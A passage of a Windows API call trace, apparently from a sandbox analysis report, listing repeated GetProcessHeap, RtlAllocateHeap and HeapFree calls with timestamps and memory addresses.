0x280000 [0058.014] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.014] GetProcessHeap () returned 0x280000 [0058.014] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.014] GetProcessHeap () returned 0x280000 [0058.014] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.014] GetProcessHeap () returned 0x280000 [0058.014] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.014] GetProcessHeap () returned 0x280000 [0058.014] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.014] GetProcessHeap () returned 0x280000 [0058.014] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0058.014] GetProcessHeap () returned 0x280000 [0058.014] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.014] GetProcessHeap () returned 0x280000 [0058.014] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.014] GetProcessHeap () returned 0x280000 [0058.014] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0058.014] GetProcessHeap () returned 0x280000 [0058.014] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0058.014] GetProcessHeap () returned 0x280000 [0058.014] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.014] GetProcessHeap () returned 0x280000 [0058.014] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.014] GetProcessHeap () returned 0x280000 [0058.014] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0058.014] GetProcessHeap () returned 0x280000 [0058.014] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.014] GetProcessHeap () returned 0x280000 [0058.014] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.014] GetProcessHeap () returned 0x280000 [0058.015] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.015] GetProcessHeap () returned 0x280000 [0058.015] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.015] GetProcessHeap () returned 0x280000 [0058.015] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.015] GetProcessHeap () returned 0x280000 [0058.015] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.015] GetProcessHeap () returned 0x280000 [0058.015] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.015] GetProcessHeap () returned 0x280000 [0058.015] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.015] GetProcessHeap () returned 0x280000 [0058.015] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.015] GetProcessHeap () returned 0x280000 [0058.015] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.141] GetProcessHeap () returned 0x280000 [0058.141] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.141] GetProcessHeap () returned 0x280000 [0058.141] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.141] GetProcessHeap () returned 0x280000 [0058.141] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.141] GetProcessHeap () returned 0x280000 [0058.141] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.141] GetProcessHeap () returned 0x280000 [0058.141] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.141] GetProcessHeap () returned 0x280000 [0058.141] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.141] GetProcessHeap () returned 0x280000 [0058.141] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.141] GetProcessHeap () returned 0x280000 [0058.141] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.141] GetProcessHeap () returned 0x280000 [0058.141] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.141] GetProcessHeap () returned 0x280000 [0058.141] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.141] GetProcessHeap () returned 0x280000 [0058.141] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.141] GetProcessHeap () returned 0x280000 [0058.141] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.141] GetProcessHeap () returned 0x280000 [0058.141] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.142] GetProcessHeap () returned 0x280000 [0058.142] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.142] GetProcessHeap () returned 0x280000 [0058.142] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.142] GetProcessHeap () returned 0x280000 [0058.142] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.142] GetProcessHeap () returned 0x280000 [0058.142] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.142] GetProcessHeap () returned 0x280000 [0058.142] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.142] GetProcessHeap () returned 0x280000 [0058.142] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.142] GetProcessHeap () returned 0x280000 [0058.142] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.142] GetProcessHeap () returned 0x280000 [0058.142] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.142] GetProcessHeap () returned 0x280000 [0058.142] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.142] GetProcessHeap () returned 0x280000 [0058.142] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.142] GetProcessHeap () returned 0x280000 [0058.142] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.142] GetProcessHeap () returned 0x280000 [0058.142] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.142] GetProcessHeap () returned 0x280000 [0058.142] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.142] GetProcessHeap () returned 0x280000 [0058.142] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.142] GetProcessHeap () returned 0x280000 [0058.142] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.142] GetProcessHeap () returned 0x280000 [0058.142] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.142] GetProcessHeap () returned 0x280000 [0058.142] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.142] GetProcessHeap () returned 0x280000 [0058.142] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.142] GetProcessHeap () returned 0x280000 [0058.142] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.143] GetProcessHeap () returned 0x280000 [0058.143] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.143] GetProcessHeap () returned 0x280000 [0058.143] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.143] GetProcessHeap () returned 0x280000 [0058.143] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.143] GetProcessHeap () returned 0x280000 [0058.143] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.143] GetProcessHeap () returned 0x280000 [0058.143] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.143] GetProcessHeap () returned 0x280000 [0058.143] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.143] GetProcessHeap () returned 0x280000 [0058.143] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.143] GetProcessHeap () returned 0x280000 [0058.143] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.143] GetProcessHeap () returned 0x280000 [0058.143] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.143] GetProcessHeap () returned 0x280000 [0058.143] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.143] GetProcessHeap () returned 0x280000 [0058.143] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.143] GetProcessHeap () returned 0x280000 [0058.143] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.143] GetProcessHeap () returned 0x280000 [0058.143] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.143] GetProcessHeap () returned 0x280000 [0058.143] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.143] GetProcessHeap () returned 0x280000 [0058.143] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.143] GetProcessHeap () returned 0x280000 [0058.143] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.143] GetProcessHeap () returned 0x280000 [0058.143] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.143] GetProcessHeap () returned 0x280000 [0058.143] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.143] GetProcessHeap () returned 0x280000 [0058.144] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.144] GetProcessHeap () returned 0x280000 [0058.144] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.144] GetProcessHeap () returned 0x280000 [0058.144] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.144] GetProcessHeap () returned 0x280000 [0058.144] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.144] GetProcessHeap () returned 0x280000 [0058.144] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.144] GetProcessHeap () returned 0x280000 [0058.144] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.144] GetProcessHeap () returned 0x280000 [0058.144] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.144] GetProcessHeap () returned 0x280000 [0058.144] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.144] GetProcessHeap () returned 0x280000 [0058.144] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.144] GetProcessHeap () returned 0x280000 [0058.144] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.144] GetProcessHeap () returned 0x280000 [0058.144] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.144] GetProcessHeap () returned 0x280000 [0058.144] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.144] GetProcessHeap () returned 0x280000 [0058.144] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.144] GetProcessHeap () returned 0x280000 [0058.144] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.144] GetProcessHeap () returned 0x280000 [0058.144] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.144] GetProcessHeap () returned 0x280000 [0058.144] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.144] GetProcessHeap () returned 0x280000 [0058.144] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.144] GetProcessHeap () returned 0x280000 [0058.144] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.144] GetProcessHeap () returned 0x280000 [0058.144] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.145] GetProcessHeap () returned 0x280000 [0058.145] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.145] GetProcessHeap () returned 0x280000 [0058.145] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.145] GetProcessHeap () returned 0x280000 [0058.145] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.145] GetProcessHeap () returned 0x280000 [0058.145] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.145] GetProcessHeap () returned 0x280000 [0058.145] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.145] GetProcessHeap () returned 0x280000 [0058.145] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.145] GetProcessHeap () returned 0x280000 [0058.145] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.145] GetProcessHeap () returned 0x280000 [0058.145] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.145] GetProcessHeap () returned 0x280000 [0058.145] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.145] GetProcessHeap () returned 0x280000 [0058.145] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.145] GetProcessHeap () returned 0x280000 [0058.145] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.145] GetProcessHeap () returned 0x280000 [0058.145] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.145] GetProcessHeap () returned 0x280000 [0058.145] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.145] GetProcessHeap () returned 0x280000 [0058.145] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.145] GetProcessHeap () returned 0x280000 [0058.145] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.145] GetProcessHeap () returned 0x280000 [0058.145] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.145] GetProcessHeap () returned 0x280000 [0058.145] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.145] GetProcessHeap () returned 0x280000 [0058.145] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.145] GetProcessHeap () returned 0x280000 [0058.146] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.146] GetProcessHeap () returned 0x280000 [0058.146] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.146] GetProcessHeap () returned 0x280000 [0058.146] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.146] GetProcessHeap () returned 0x280000 [0058.146] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.146] GetProcessHeap () returned 0x280000 [0058.146] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.146] GetProcessHeap () returned 0x280000 [0058.146] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.146] GetProcessHeap () returned 0x280000 [0058.146] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.146] GetProcessHeap () returned 0x280000 [0058.146] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.146] GetProcessHeap () returned 0x280000 [0058.146] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.146] GetProcessHeap () returned 0x280000 [0058.146] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.146] GetProcessHeap () returned 0x280000 [0058.146] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.146] GetProcessHeap () returned 0x280000 [0058.146] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.146] GetProcessHeap () returned 0x280000 [0058.146] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.146] GetProcessHeap () returned 0x280000 [0058.146] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.146] GetProcessHeap () returned 0x280000 [0058.146] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.146] GetProcessHeap () returned 0x280000 [0058.146] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.146] GetProcessHeap () returned 0x280000 [0058.146] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.146] GetProcessHeap () returned 0x280000 [0058.146] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.146] GetProcessHeap () returned 0x280000 [0058.146] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.147] GetProcessHeap () returned 0x280000 [0058.147] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.147] GetProcessHeap () returned 0x280000 [0058.147] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.147] GetProcessHeap () returned 0x280000 [0058.147] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.147] GetProcessHeap () returned 0x280000 [0058.147] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.147] GetProcessHeap () returned 0x280000 [0058.147] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.147] GetProcessHeap () returned 0x280000 [0058.147] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.147] GetProcessHeap () returned 0x280000 [0058.147] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.147] GetProcessHeap () returned 0x280000 [0058.147] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.147] GetProcessHeap () returned 0x280000 [0058.147] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.147] GetProcessHeap () returned 0x280000 [0058.147] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.147] GetProcessHeap () returned 0x280000 [0058.147] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.147] GetProcessHeap () returned 0x280000 [0058.147] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.147] GetProcessHeap () returned 0x280000 [0058.147] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.147] GetProcessHeap () returned 0x280000 [0058.147] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.147] GetProcessHeap () returned 0x280000 [0058.147] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.147] GetProcessHeap () returned 0x280000 [0058.147] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.147] GetProcessHeap () returned 0x280000 [0058.147] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.147] GetProcessHeap () returned 0x280000 [0058.147] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.147] GetProcessHeap () returned 0x280000 [0058.147] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.148] GetProcessHeap () returned 0x280000 [0058.148] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.148] GetProcessHeap () returned 0x280000 [0058.148] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.148] GetProcessHeap () returned 0x280000 [0058.148] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.148] GetProcessHeap () returned 0x280000 [0058.148] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.148] GetProcessHeap () returned 0x280000 [0058.148] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.148] GetProcessHeap () returned 0x280000 [0058.148] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.148] GetProcessHeap () returned 0x280000 [0058.148] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.148] GetProcessHeap () returned 0x280000 [0058.148] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.148] GetProcessHeap () returned 0x280000 [0058.148] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.148] GetProcessHeap () returned 0x280000 [0058.148] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.148] GetProcessHeap () returned 0x280000 [0058.148] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.148] GetProcessHeap () returned 0x280000 [0058.148] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.148] GetProcessHeap () returned 0x280000 [0058.148] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.148] GetProcessHeap () returned 0x280000 [0058.148] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.148] GetProcessHeap () returned 0x280000 [0058.148] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.148] GetProcessHeap () returned 0x280000 [0058.148] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.148] GetProcessHeap () returned 0x280000 [0058.148] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.148] GetProcessHeap () returned 0x280000 [0058.148] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.148] GetProcessHeap () returned 0x280000 [0058.149] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.149] GetProcessHeap () returned 0x280000 [0058.149] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.149] GetProcessHeap () returned 0x280000 [0058.149] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.149] GetProcessHeap () returned 0x280000 [0058.149] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.149] GetProcessHeap () returned 0x280000 [0058.149] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.149] GetProcessHeap () returned 0x280000 [0058.149] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.149] GetProcessHeap () returned 0x280000 [0058.149] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.149] GetProcessHeap () returned 0x280000 [0058.149] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.149] GetProcessHeap () returned 0x280000 [0058.149] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.149] GetProcessHeap () returned 0x280000 [0058.149] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.149] GetProcessHeap () returned 0x280000 [0058.149] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.149] GetProcessHeap () returned 0x280000 [0058.149] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.149] GetProcessHeap () returned 0x280000 [0058.149] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.149] GetProcessHeap () returned 0x280000 [0058.149] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.149] GetProcessHeap () returned 0x280000 [0058.149] HeapFree (in: hHeap=0x280000, dwFlags=0x0, 